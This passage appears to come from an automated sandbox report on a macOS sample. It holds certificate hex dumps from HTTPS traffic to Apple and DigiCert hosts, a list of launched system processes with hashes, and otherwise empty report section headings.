01 BD CF A1 88 02 %...!..,.`......0060: 20 44 80 AA D3 BD 3E 37 44 F3 0A 97 13 C3 B9 6B D....>7D......k0070: 85 13 16 B6 6B 7D A1 AA 8F 2C 24 17 67 90 FA D5 ....k....,$.g...0080: 01 00 77 00 56 14 06 9A 2F D7 C2 EC D3 F5 E1 BD ..w.V.../.......0090: 44 B2 3E C7 46 76 B9 BC 99 11 5C C0 EF 94 98 55 D.>.Fv....\....U00A0: D6 89 D0 DD 00 00 01 60 51 4C FE 9B 00 00 04 03 .......`QL......00B0: 00 48 30 46 02 21 00 D5 4A F2 E8 B6 00 A9 8F 3A .H0F.!..J......:00C0: F2 1A 57 8E EA 97 FC 3A 4E AD 43 F9 96 DB 04 0A ..W....:N.C.....00D0: 90 37 97 29 52 B4 0E 02 21 00 F2 95 49 1D B9 F9 .7.)R...!...I...00E0: E2 BE AB 58 AC 3C CD 7F B6 D8 62 D7 0C 65 84 71 ...X.<....b..e.q00F0: C6 0F 0E 99 8F 42 BB F8 FB 41 00 77 00 EE 4B BD .....B...A.w..K.0100: B7 75 CE 60 BA E1 42 69 1F AB E1 9E 66 A3 0F 7E .u.`..Bi....f...0110: 5F B0 72 D8 83 00 C4 7B 89 7A A8 FD CB 00 00 01 _.r......z......0120: 60 51 4D 00 57 00 00 04 03 00 48 30 46 02 21 00 `QM.W.....H0F.!.0130: CD 5E 68 71 55 FF 56 8B 6B CD FE 96 64 AD 3D 3F .^hqU.V.k...d.=?0140: 1E 11 98 99 ED CD BE 07 10 18 1C C9 EE 68 47 7E .............hG.0150: 02 21 00 C0 F3 AB 76 EA 42 28 FD 52 BC F4 5C F0 .!....v.B(.R..\.0160: EA 4A 88 7C 4C B6 20 57 DC 46 1A DA 14 CE AF 8F .J..L. W.F......0170: 20 95 EA 00 77 00 BB D9 DF BC 1F 8A 71 B5 93 94 ...w.......q...0180: 23 97 AA 92 7B 47 38 57 95 0A AB 52 E8 1A 90 96 #....G8W...R....0190: 64 36 8E 1E D1 85 00 00 01 60 51 4C FE 37 00 00 d6.......`QL.7..01A0: 04 03 00 48 30 46 02 21 00 86 0B 42 74 6E 82 E3 ...H0F.!...Btn..01B0: 71 3C 35 08 6E C6 0B 21 B1 A1 8F A3 92 EC E0 48 q<5.n..!.......H01C0: 7E A3 77 4B 76 A8 58 1F 4D 02 21 00 EB 68 51 1C ..wKv.X.M.!..hQ.01D0: BA 14 DB D7 47 1D 7F A3 15 9A B6 1B E3 0F 1B F6 ....G...........01E0: 1C 38 F5 B4 25 20 75 8A 50 0A 71 00 .8..% u.P.q.[2]: ObjectId: 1.3.6.1.5.5.7.1.1 Criticality=falseAuthorityInfoAccess [ [ accessMethod: ocsp accessLocation: URIName: http://ocsp.digicert.com, accessMethod: caIssuers accessLocation: URIName: http://cacerts.digicert.com/DigiCertSHA2ExtendedValidationServerCA.crt]][3]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: 3D D3 50 A5 D6 A0 AD EE F3 4A 60 0A 65 D3 21 D4 =.P......J`.e.!.0010: F8 F8 D6 0F ....]][4]: ObjectId: 2.5.29.19 Criticality=falseBasicConstraints:[ CA:false PathLen: undefined][5]: ObjectId: 2.5.29.31 Criticality=falseCRLDistributionPoints [ [DistributionPoint: [URIName: http://crl3.digicert.com/sha2-ev-server-g2.crl], DistributionPoint: [URIName: http://crl4.digicert.com/sha2-ev-server-g2.crl]]][6]: ObjectId: 2.5.29.32 Criticality=falseCertificatePolicies [ [CertificatePolicyId: [2.16.840.1.114412.2.1][PolicyQualifierInfo: [ qualifierID: 1.3.6.1.5.5.7.2.1 qualifier: 0000: 16 1C 68 74 74 70 73 3A 2F 2F 77 77 77 2E 64 69 ..https://www.di0010: 67 69 63 65 72 74 2E 63 6F 6D 2F 43 50 53 gicert.com/CPS]] ] [CertificatePolicyId: [2.23.140.1.1][] ]][7]: ObjectId: 2.5.29.37 Criticality=falseExtendedKeyUsages [ serverAuth clientAuth][8]: ObjectId: 2.5.29.15 Criticality=trueKeyUsage [ DigitalSignature Key_Encipherment][9]: ObjectId: 2.5.29.17 Criticality=falseSubjectAlternativeName [ DNSName: helposx.apple.com DNSName: prohelp.apple.com DNSName: help.apple.com][10]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: 34 06 FD F5 0A 41 93 AB C1 15 BD 12 A5 F0 B5 49 4....A.........I0010: D2 41 40 7D .A@.]]] Algorithm: [SHA256withRSA] Signature:0000: 5D FA 62 A9 06 65 FF 97 3A 8A 85 C3 82 4E D8 44 ].b..e..:....N.D0010: AA E7 96 3E 2D 2E 20 16 A9 14 15 B9 B1 22 24 46 ...>-. ......"$F0020: 56 BE 02 59 B8 F5 38 7F A4 8E 03 36 62 B1 DB 8E V..Y..8....6b...0030: EB 53 01 50 59 A2 FA B9 CC 2B 7F CA 39 62 A0 0F .S.PY....+..9b..0040: 53 00 98 7B 15 34 4B 6E 8A 6F CC 5C E6 26 2D 97 S....4Kn.o.\.&-.0050: EE 8C 13 FD 14 33 5A 6A 00 A8 E7 67 11 DB BA 69 .....3Zj...g...i0060: 15 87 F4 DE BF AC 94 92 E3 3C 80 67 0C BE 60 88 .........<.g..`.0070: C2 8B 53 36 95 E2 85 DB C9 34 73 69 92 01 AE 6D ..S6.....4si...m0080: 80 C2 BC 77 85 DA F0 18 5E 85 0B 01 4F 91 25 75 ...w....^...O.%u0090: CC FC F0 B7 1E 46 4C 2F 8D 2B C9 0C 25 02 FE 94 .....FL/.+..%...00A0: 3E 2A A3 77 37 6D F2 5C 78 69 58 91 AA 72 98 14 >.w7m.\xiX..r..00B0: 7D 5D AB 79 5F DD 48 99 5A 8B 50 91 99 F4 6D 6A .].y_.H.Z.P...mj00C0: 27 8D 2A B9 76 8C 40 51 D3 C7 79 5E C4 2C C2 67 '.*.v.@Q..y^.,.g00D0: 39 0B 81 60 D0 1E 34 FD 34 06 29 8F 7B E8 A1 0E 9..`..4.4.).....00E0: 9D D6 B4 F7 5C F1 98 17 20 75 7A B6 D4 84 87 DD ....\... uz.....00F0: 4B 0A 83 24 00 7F 14 7B F0 DC 59 1D 47 92 6D F7 K..$......Y.G.m.]
Jan 16, 2018 10:38:29.489674091 MEZ	443	49192	23.45.113.221	192.168.0.53	CN=DigiCert SHA2 Extended Validation Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Tue Oct 22 14:00:00 CEST 2013	Sun Oct 22 14:00:00 CEST 2028	[[ Version: V3 Subject: CN=DigiCert SHA2 Extended Validation Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US Signature Algorithm: SHA256withRSA, OID = 1.2.840.113549.1.1.11 Key: Sun RSA public key, 2048 bits modulus: 27182480329609083645624358951312470735111101465904409517579603324443610948627123317276574372284092612395466705913697296538729051610615914979630979130353728187634968718301037795642657343511174042315836449309023250377748929072088632079297292400799455978070288868084050898983836205888774855547544255622648360396227755156561340192722735895290847161205245369772696734401944671246358701321167149070896780343739667326363444343051093227411009129654263748425661222582889902796954800796685968517689977802189122916931470605744698837719347057766694419404975072163417802333656859496792447815284011528855507761771697613578237909299 public exponent: 65537 Validity: [From: Tue Oct 22 14:00:00 CEST 2013, To: Sun Oct 22 14:00:00 CEST 2028] Issuer: CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US SerialNumber: [ 0c79a944 b08c1195 2092615f e26b1d83]Certificate Extensions: 8[1]: ObjectId: 1.3.6.1.5.5.7.1.1 Criticality=falseAuthorityInfoAccess [ [ accessMethod: ocsp accessLocation: URIName: http://ocsp.digicert.com]][2]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: B1 3E C3 69 03 F8 BF 47 01 D4 98 26 1A 08 02 EF .>.i...G...&....0010: 63 64 2B C3 cd+.]][3]: ObjectId: 2.5.29.19 Criticality=trueBasicConstraints:[ CA:true PathLen:0][4]: ObjectId: 2.5.29.31 Criticality=falseCRLDistributionPoints [ [DistributionPoint: [URIName: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl]]][5]: ObjectId: 2.5.29.32 Criticality=falseCertificatePolicies [ [CertificatePolicyId: [2.5.29.32.0][PolicyQualifierInfo: [ qualifierID: 1.3.6.1.5.5.7.2.1 qualifier: 0000: 16 1C 68 74 74 70 73 3A 2F 2F 77 77 77 2E 64 69 ..https://www.di0010: 67 69 63 65 72 74 2E 63 6F 6D 2F 43 50 53 gicert.com/CPS]] ]][6]: ObjectId: 2.5.29.37 Criticality=falseExtendedKeyUsages [ serverAuth clientAuth][7]: ObjectId: 2.5.29.15 Criticality=trueKeyUsage [ DigitalSignature Key_CertSign Crl_Sign][8]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: 3D D3 50 A5 D6 A0 AD EE F3 4A 60 0A 65 D3 21 D4 =.P......J`.e.!.0010: F8 F8 D6 0F ....]]] Algorithm: [SHA256withRSA] Signature:0000: 9D B6 D0 90 86 E1 86 02 ED C5 A0 F0 34 1C 74 C1 ............4.t.0010: 8D 76 CC 86 0A A8 F0 4A 8A 42 D6 3F C8 A9 4D AD .v.....J.B.?..M.0020: 7C 08 AD E6 B6 50 B8 A2 1A 4D 88 07 B1 29 21 DC .....P...M...)!.0030: E7 DA C6 3C 21 E0 E3 11 49 70 AC 7A 1D 01 A4 CA ...<!...Ip.z....0040: 11 3A 57 AB 7D 57 2A 40 74 FD D3 1D 85 18 50 DF .:W..W*@t.....P.0050: 57 47 75 A1 7D 55 20 2E 47 37 50 72 8C 7F 82 1B WGu..U .G7Pr....0060: D2 62 8F 2D 03 5A DA C3 C8 A1 CE 2C 52 A2 00 63 .b.-.Z.....,R..c0070: EB 73 BA 71 C8 49 27 23 97 64 85 9E 38 0E AD 63 .s.q.I'#.d..8..c0080: 68 3C BA 52 81 58 79 A3 2C 0C DF DE 6D EB 31 F2 h<.R.Xy.,...m.1.0090: BA A0 7C 6C F1 2C D4 E1 BD 77 84 37 03 CE 32 B5 ...l.,...w.7..2.00A0: C8 9A 81 1A 4A 92 4E 3B 46 9A 85 FE 83 A2 F9 9E ....J.N;F.......00B0: 8C A3 CC 0D 5E B3 3D CF 04 78 8F 14 14 7B 32 9C ....^.=..x....2.00C0: C7 00 A6 5C C4 B5 A1 55 8D 5A 56 68 A4 22 70 AA ...\...U.ZVh."p.00D0: 3C 81 71 D9 9D A8 45 3B F4 E5 F6 A2 51 DD C7 7B <.q...E;....Q...00E0: 62 E8 6F 0C 74 EB B8 DA F8 BF 87 0D 79 50 91 90 b.o.t.......yP..00F0: 9B 18 3B 91 59 27 F1 35 28 13 AB 26 7E D5 F7 7A ..;.Y'.5(..&...z]

System Behavior

Analysis Process: xpcproxy PID: 509 Parent PID: 1

General

Start time:	10:38:25
Start date:	16/01/2018
Path:	/usr/libexec/xpcproxy
File size:	42656 bytes
MD5 hash:	d68b4c6f2056c73e1d3bd228bcd6d4ff

Start time:	10:38:30
Start date:	16/01/2018
Path:	/usr/libexec/xpcproxy
File size:	42656 bytes
MD5 hash:	d68b4c6f2056c73e1d3bd228bcd6d4ff

Start time:	10:38:31
Start date:	16/01/2018
Path:	/bin/echo
File size:	18032 bytes
MD5 hash:	28aaba1826ce568b1eec9cf71ad0655c

Start time:	10:38:32
Start date:	16/01/2018
Path:	/usr/bin/stat
File size:	27376 bytes
MD5 hash:	e325a36f6628a912b814e915d466c994

Start time:	10:38:33
Start date:	16/01/2018
Path:	/usr/sbin/networksetup
File size:	203072 bytes
MD5 hash:	679d83de42bfa3589a8651a7408bdf66

Start time:	10:38:34
Start date:	16/01/2018
Path:	/usr/sbin/networksetup
File size:	203072 bytes
MD5 hash:	679d83de42bfa3589a8651a7408bdf66

Start time:	10:38:38
Start date:	16/01/2018
Path:	/bin/echo
File size:	18032 bytes
MD5 hash:	28aaba1826ce568b1eec9cf71ad0655c

Start time:	10:38:39
Start date:	16/01/2018
Path:	/usr/sbin/networksetup
File size:	203072 bytes
MD5 hash:	679d83de42bfa3589a8651a7408bdf66

Start time:	10:38:40
Start date:	16/01/2018
Path:	/usr/sbin/ioreg
File size:	44800 bytes
MD5 hash:	940d0bc7df76362d3beb0757f4879ef6

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report

Overview

General Information

Detection

Classification

Signature Overview

Cryptography:

Networking:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Runtime Messages

Behavior Graph

Yara Overview

Initial Sample

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Antivirus Detection

Initial Sample

Dropped Files

Domains

Screenshot

Startup

Created / dropped Files

Contacted Domains/Contacted IPs

Contacted Domains

Contacted IPs

Static File Info

General

Static Mach Info

General Informations for header0

segment_command_64

segment_command_64

segment_command_64

segment_command_64

dyld_info_command

symtab_command

dysymtab_command

dylinker_command

uuid_command

version_min_command

source_version_command

entry_point_command

dylib_command

dylib_command

dylib_command

dylib_command

dylib_command

dylib_command

dylib_command

dylib_command

dylib_command

dylib_command

dylib_command

dylib_command

dylib_command

linkedit_data_command

linkedit_data_command

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

ICMP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

HTTPS Packets